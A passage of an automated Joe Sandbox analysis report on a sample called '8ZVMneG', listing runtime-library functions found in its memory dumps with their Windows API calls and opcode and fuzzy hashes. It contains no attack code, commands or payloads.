                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                  • Opcode ID: 8393424676c3392d0f6ee1a19c60452009682470be79533b4cc8c69603657fb5
                                                                                                                                                                                                                                                                  • Instruction ID: e6f67c25b4bc476f9b084fcc7585ab54226df19fc6533a2d2362dec9db6c1c69
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8393424676c3392d0f6ee1a19c60452009682470be79533b4cc8c69603657fb5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10D0A7756063986F93005F737C0C8763FA4DFC43003014112F800F3222F2B05604CB50
                                                                                                                                                                                                                                                                  Function 00EDFF39 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 004b9e1b480a18b37fe7a99cffea481ccda5990e3e9c650d887b91d8b1f9e0f6
                                                                                                                                                                                                                                                                  • Instruction ID: 654ca8a0ae61b83ab0566c89ea852e82e938eb2f64c6237b969a1a07621c744f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004b9e1b480a18b37fe7a99cffea481ccda5990e3e9c650d887b91d8b1f9e0f6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECB10770A0428DAFDB12DFAAC880BBE7BF0EF49314F145159E5457B392C7B09982CB51
                                                                                                                                                                                                                                                                  Function 00ED6112 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00ED6109,00ECC977,00ECB7A5), ref: 00ED6120
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00ED612E
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ED6147
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00ED6109,00ECC977,00ECB7A5), ref: 00ED6199
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                  • Opcode ID: 535576f04da25489b1a14992b0f548f0e667612ee2a6d0650b1704cf107d10a1
                                                                                                                                                                                                                                                                  • Instruction ID: 35a55c3ea98f1185780de737da31d0b44ecbaeee5a2c36ca82bae82c377a23c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 535576f04da25489b1a14992b0f548f0e667612ee2a6d0650b1704cf107d10a1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A01283211AB115EA63517766C8597726E4EB65379320222FF128753F2EF210C5AD140
                                                                                                                                                                                                                                                                  Function 00ED69DA Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00ED6AF9
                                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00ED6D72
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                  • Opcode ID: 2a96f96bb2aa1d799cd8e27bbaf790b6e80780aa38ca5c28ab9a2cadf2709aa0
                                                                                                                                                                                                                                                                  • Instruction ID: 72d324495ae50eb718c5bebf3a8c62b76cdd9ca0e9cfa05812fab0a2d4fb5611
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a96f96bb2aa1d799cd8e27bbaf790b6e80780aa38ca5c28ab9a2cadf2709aa0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B18871900209EFCF18EFA4D9819AEBBB5FF08304B10645BE815BB312D731EA52CB91
                                                                                                                                                                                                                                                                  Function 00ED139D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A38A0892,?,?,00000000,00EE7345,000000FF,?,00ED145E,00000002,?,00ED14FA,00ED415D), ref: 00ED13D2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00ED13E4
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00EE7345,000000FF,?,00ED145E,00000002,?,00ED14FA,00ED415D), ref: 00ED1406
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 6e353ab51ab7ad69959b02caed46da3d1a77115a60bbfdc8598f0d6395e1ac57
                                                                                                                                                                                                                                                                  • Instruction ID: 019e1730edfe5f56bf7365fc650abc6201682c9e6b73acdbf8be6cd49ecb3f1e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e353ab51ab7ad69959b02caed46da3d1a77115a60bbfdc8598f0d6395e1ac57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74018F31904659AFDB159B51CC09FBEBBB8FB84B14F00422AF811B2691DB749904CA80
                                                                                                                                                                                                                                                                  Function 00ED8B36 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00ED8BBB
                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00ED8C84
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00ED8CEB
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7381: RtlAllocateHeap.NTDLL(00000000,00ED935A,?,?,00ED935A,00000220,?,00000001,?), ref: 00ED73B3
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00ED8CFE
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00ED8D0B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                  • Opcode ID: aaf525e92f08ccca2bca67c1d930c1f409cf26c1a8e7a3e60a5f8d35452e4aa9
                                                                                                                                                                                                                                                                  • Instruction ID: 02c415675bf1c7487bb4498395dc4d1690f33078681255dd8b0b27e72e9b8a3d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaf525e92f08ccca2bca67c1d930c1f409cf26c1a8e7a3e60a5f8d35452e4aa9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F051A272611206AFEB215F61CE42EBB7AAEEF54714F25142AFD04F6381EF31DC129660
                                                                                                                                                                                                                                                                  Function 00EC94BF Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00EC94C6
                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00EC94D1
                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00EC953F
                                                                                                                                                                                                                                                                    • Part of subcall function 00EC93C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EC93E0
                                                                                                                                                                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00EC94EC
                                                                                                                                                                                                                                                                  • _Yarn.LIBCPMT ref: 00EC9502
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                  • Opcode ID: a50bce4b115d80a511112ed45c2009574a752749a08d054c11ec917a28732eed
                                                                                                                                                                                                                                                                  • Instruction ID: cbe599f8991c1654dc076714abe59b02939522d981eafdcf5651c1842c3acd8b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a50bce4b115d80a511112ed45c2009574a752749a08d054c11ec917a28732eed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B701BC75A012519FC70AEB21DA4AA7C7BA1BFC4350B16100CE801B7382CB35AF47CB81
                                                                                                                                                                                                                                                                  Function 00EE1BB1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EE1C4D,00000000,?,00EF40C8,?,?,?,00EE1B84,00000004,InitializeCriticalSectionEx,00EEB2A4,00EEB2AC), ref: 00EE1BBE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EE1C4D,00000000,?,00EF40C8,?,?,?,00EE1B84,00000004,InitializeCriticalSectionEx,00EEB2A4,00EEB2AC,00000000,?,00ED702C), ref: 00EE1BC8
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EE1BF0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                  • Opcode ID: abe0d1c9f09e863dff80438ed1434499166081d1a082b258459391706f8c5645
                                                                                                                                                                                                                                                                  • Instruction ID: c58998ee74210474e7510b36ce835fd38595e691329f6239349ec2a47d49640a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe0d1c9f09e863dff80438ed1434499166081d1a082b258459391706f8c5645
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE01A3068428DFBEB101BA2EC06F293B58AB94B45F145060F90CB80A2FBB199959684
                                                                                                                                                                                                                                                                  Function 00EDF309 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(A38A0892,00000000,00000000,?), ref: 00EDF36C
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EDF5BE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EDF604
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00EDF6A7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                  • Opcode ID: 838c9274e1b6fdfdac9e2db9aeded13f77529d690ec4a2c556d5ccb9fc26e239
                                                                                                                                                                                                                                                                  • Instruction ID: 15f8eda0827bcd91548bfc4bdde20d3b15117a5b0439552c22db9d769cdf6772
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 838c9274e1b6fdfdac9e2db9aeded13f77529d690ec4a2c556d5ccb9fc26e239
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3D15BB5D002489FCB15CFA8D8809EDBBF5EF49314F28516AE866FB361D630E946CB50
                                                                                                                                                                                                                                                                  Function 00ED6701 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                  • Opcode ID: aaaf30060a30b50657509f90ea2ed1e5c83d99b42512320c9ba9e4167de977df
                                                                                                                                                                                                                                                                  • Instruction ID: 25170693436454574e43debeeea99477216b73696dad3bb4b4a00726167a0be7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaaf30060a30b50657509f90ea2ed1e5c83d99b42512320c9ba9e4167de977df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4510279A006069FEB288F50C941BBAB7B4EF54718F24552FE805B73A1E732EC42D790
                                                                                                                                                                                                                                                                  Function 00EDD135 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EDD199
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EDD1A0
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EDD1DA
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EDD1E1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
